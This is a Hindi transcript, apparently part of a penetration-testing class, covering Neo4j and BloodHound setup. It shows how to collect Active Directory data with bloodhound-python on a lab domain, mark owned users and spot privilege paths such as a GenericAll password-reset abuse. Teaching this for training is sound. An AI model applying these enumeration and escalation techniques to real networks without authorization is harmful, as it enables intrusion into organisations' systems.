दीजिएगा, ठीक है। तो Neo4j आपके सिस्टम पे इंस्टॉल हो जाएगा। दूसरी चीज़ आपको करनी है apt-get install bloodhound, ठीक है। तो दोनों चीज़ आपके सिस्टम पे पहले से होनी चाहिए। फिर आपको क्या करना है, सबसे पहले स्टार्ट करना है Neo4j, क्योंकि वो एक बैक एंड डेटाबेस होता है। तो आपको लिखना है Neo4j स्टार्ट, इतना करके ही आपके सिस्टम पे Neo4j डेटाबेस स्टार्ट हो जाएगा। तो आपके सिस्टम पे लोकल होस्ट 7474 पे ये रन कर रहा होता है, तो उसको URL कॉपी करके आप चेक भी कर सकते हो, ठीक है। पहली बार आप जाओगे, क्या हो गया इसको, पहली बार आप जाओगे तो डिफ़ॉल्ट पासवर्ड इसका यूज़र नेम Neo4j होता है। फॉर नेक्स्ट टाइम आपको इसको कनेक्शन के लिए एक बार न्यू पासवर्ड जनरेट करना होता है, तो आप यहाँ पे आके कंसोल पे आके इसको जनरेट कर सकते हो, ठीक। अगला काम होता है आपको यहाँ पे ब्लड हाउंड रन करना, तो यहाँ पे लिखो ब्लड हाउंड, ठीक है। तो एक आपके पास GUI इंटरफेस ओपन हो जाएगा जो आपके Neo4j का यूज़र नेम पासवर्ड मांगेगा और आपको यहाँ पे उसको एक्सेस दे देना है। तो ये आपको यहाँ पे कुछ इस तरह से ये शो करेगा, ठीक है। अभी मैं इसको ब्लैंक कर देता हूँ ताकि आपको चीज़ें दिख जाए। ठीक है, अब ये क्या ब्लैंक हो चुका है। अब मेरे को क्या करना है, अब मेरे को विक्टिम की मशीन से इन्फॉर्मेशन गैदर करनी है, उसके सिस्टम से इन्फॉर्मेशन निकालनी है। तो उसके लिए मैं क्या करूँगा, अपने सिस्टम पे इसके दो तरीके थे। पुराना तरीका ये है कि हमारे पास एक शार फाउंड नाम की फ़ाइल हुआ करती थी, उसको हम विक्टिम की मशीन पे रन करते थे, वहाँ से मेरे को एक जिप फाइल मिलती थी, फिर मैं उसको एक्सट्रैक्ट, उसको फॉरवर्ड करता था अपनी मशीन पे, फिर उसको अपलोड करता था। लेकिन अब हम नया टूल यूज़ करते हैं, उसको कहते हैं ब्लड हाउंड -python करके, हम अपनी मशीन से ही उसको स्कैन कर सकते हैं, ठीक है। तो इसमें देखो चीज़ें क्या क्या देनी होती है, ब्लड हाउंड -u यूज़र नेम, इसीलिए ली थोड़ी सी थी। अब मैं क्या कर सकता हूँ, मैं समझा आपने सिस्टम भी बंद करके मैं समझा घर गए हो, ये रहेगा, ठीक है। आपको क्या देना है, ब्लड हाउंड -python लिखना है, यूज़र नेम देना है जिसका आपके पास एक्सेस है, उसका पासवर्ड देना है, अपना डोमेन असाइन करना है, उसका नेम सर्वर प्रोवाइड करना है जिससे वो नेम हो, और -c all आपकी सर्विस फाइंड करने के लिए, सारी इन्फॉर्मेशन गैदर करने के लिए -c all करना है और एंटर कर देना है। एक सेकंड, गलत जगह नहीं मिली, गलत जगह कर रहा है। हमको यहाँ करना था, फोल्डर गलत हो जाएगा। हाँ ठीक है, यहाँ पे दोबारा रन करता हूँ सामान को, एंटर करता है। ठीक है, देखो इसने क्या क्या इन्फॉर्मेशन निकाल के मेरे को दिखाई कि एक डोमेन है, 2 कंप्यूटर है इसके अंदर, 2 डिवाइसेस हैं, यानी कि LDAP सर्वर का डोमेन ये रहा। टोटल मिला के 8 यूजर्स हैं इस डोमेन के अंदर, 53 ग्रुप्स हैं, 4 ग्रुप पॉलिसीज़ हैं, 1 ऑर्गेनाइजेशन यूनिट है, 12 कंटेनर्स हैं और 1 ट्रस्ट है,
ठीक है। तो इतने मेरे पास क्या है यहाँ पे इन्फॉर्मेशन, और आप चेक करोगे तो उसने जेसन्स फाइल मेरे को यहाँ पे बना के दी है सारी, ठीक है। तो अब मेरे को क्या करना है, खाली यहाँ पे आपको अपने फोल्डर पे आना है, जहाँ पे आपने इनको रन किया था कमांड को, उसको ओपन करना है। जो भी जेसन की फाइल्स आपको मिली हैं उनको ड्रैग एंड ड्रॉप करके अपने ब्लड हाउंड पे छोड़ देना है। तो ड्रैग एंड ड्रॉप करके आप जब इस फाइल को सारी को अपलोड कर दोगे तो यहाँ पे आपके डेटा सेट्स में इसको इन्फॉर्मेशन अपलोड हो जाएगी और आप उसको इनुमरेट कर सकते हो, ठीक है। तो देखो जैसे यहाँ पे सब कुछ 100% हो चुका है, इसको बंद कर देते हैं। यहाँ पे अपने रिफ्रेश करते हैं एक बार, तो यहाँ पे आप चेक करोगे 8 यूजर्स, 53 ग्रुप्स, 2 कंप्यूटर्स और 1 OUs, है ना। अब जैसे जिस यूज़र पे आप हो, मैं मान लो वीडियो पे हूँ, ठीक है, video@marvel.com पे गए, मैंने उस यूज़र को सिलेक्ट किया और राइट क्लिक करके कर दिया मार्क एज ओन्ड, यानी कि मेरे पास इसका एक्सेस है। करने के बाद मैं यहाँ पे नोड इन्फो में जाऊँगा, यूज़र को सिलेक्ट करूँगा और मेरे को जो भी पॉलिसी इस पर इम्प्लीमेंटेड है सारी मेरे को शो करने लगेगा वो। यहाँ पे आप नीचे चेक करोगे तो ग्रुप्स मिल जाएंगे, किस किस यूज़र पे आपका आता है, ठीक है। तो ये जो देखो यूज़र है, वीडियो यूज़र, ये आपका मेंबर किसका है, डोमेन एडमिन्स का मेंबर है ऑलरेडी, क्या है ये एडमिन है ना। फिर इसी तरह यहाँ पे क्या है, डेलीवेट लोड एडमिन, जो भी आपको इन्फॉर्मेशन फाइंड करनी है वो, एनालिसिस करना है वो, और बाकी सारी इन्फॉर्मेशन वो, ठीक है। तो सारी इन्फॉर्मेशन निकाल के दे देगा आप यूज़र पे क्या हो, क्या परमिशन आपके पास है, ठीक है। मान लीजिए मेरे पास सिस्टम पे एक यूज़र था, इसका नाम था SMB यूज़र, ठीक है। इसको एनालाइज करता हूँ मैं, इसके पास कोई परमिशन नहीं थी, बेसिकली नॉर्मल था ये, लेकिन इस यूज़र को, SMB यूज़र को एंटरप्राइज एडमिन से जेनरिक ऑल नाम की परमिशन असाइन है, ठीक है। अगर मेरे पास SMB यूज़र का एक्सेस आ जाए और मैं जेनरिक ऑल का यूज़ करके लिनक्स अब्यूज़ करके उस पर यूज़र का पासवर्ड मंगा सकता हूँ, तो वो भी ये बता देता है कमांड क्या आप यूज़ कर सकते हो यहाँ पे। तो ब्लड हाउंड बहुत पावरफुल टूल है AD के लिए। एक्टिव डायरेक्टरी के अंदर ब्लड हाउंड बहुत ज़्यादा यूज़ किया जाता है, ज़रूरी नहीं है वो विंडोज़ बेस्ड हो, वो लिनक्स बेस्ड भी कर सकता है, वो एज़ोर बेस्ड क्लाउड बेस्ड भी कर सकता है, AWS भी कर सकता है, सारे। इसका कम्युनिटी वर्जन अलग आता है, एंटरप्राइज वर्जन अलग आता है। एंटरप्राइज वर्जन इससे अच्छा होता है, वो और डीप में स्कैन करता है। समझ में आप सबको इतना? ठीक है, ठीक है, थोड़ी देर का ब्रेक। हाँ हाँ, प्रैक्टिकल एग्जाम्स पे आप ब्लड हाउंड यूज़ कर सकते हो। दो होते हैं, कम्युनिटी और एंटरप्राइज, ठीक है। तो 15 मिनट का ब्रेक ले लेते हैं, उसके बाद फिर कंटिन्यू करेंगे, ओके। 5:30 5:30 पे, ठीक है।